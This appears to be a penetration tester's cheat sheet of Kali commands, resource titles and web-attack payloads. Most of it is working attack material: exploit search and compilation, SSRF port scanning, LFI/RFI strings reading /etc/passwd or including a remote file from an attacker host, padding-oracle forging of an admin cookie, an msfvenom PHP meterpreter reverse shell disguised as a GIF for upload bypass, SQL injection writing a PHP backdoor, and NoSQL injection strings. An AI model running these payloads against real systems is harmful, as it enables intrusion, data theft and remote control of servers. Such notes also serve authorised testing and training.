That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.
— Jeff Moss
Kali> searchsploit windows 2003 | grep -i local
Google> site:exploit-db.com exploit kernel <= 3
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Kali> gcc -m32 -o output32 hello.c  # 32-bit build
Kali> gcc -m64 -o output hello.c    # 64-bit build
Resources
Cracking the Lens: Attacking HTTP's hidden attack surface
How I hacked hundreds of companies through their helpdesk
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS Attack: Busting browsers to root
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Sometimes what appears to be RFI can actually lead to SSRF; here are some commands to help.
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
# send the payload as POST data
expect://whoami
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Automated Padding Oracle Attacks with Padbuster
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 \
    -cookies "ENC-COOKIE" \
    -plaintext '{"user":"admin","role":"admin"}'
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo "FFD8FFE0" | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Kali> curl -X POST \
    -F "field1=test" \
    -F "file=@/home/user/evil.gif" \
    --cookie "cookie" \
    http://$TARGET/upload.php
Resources
How to Bypass E-Mail gateways using common payloads
Resources
An interesting route to domain admin via ISCSI
SQLMap tricks for advanced SQL injection
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
SQL Injection Cheatsheet MSSQL
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
Resources
Introduction to Telephony and PBX
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET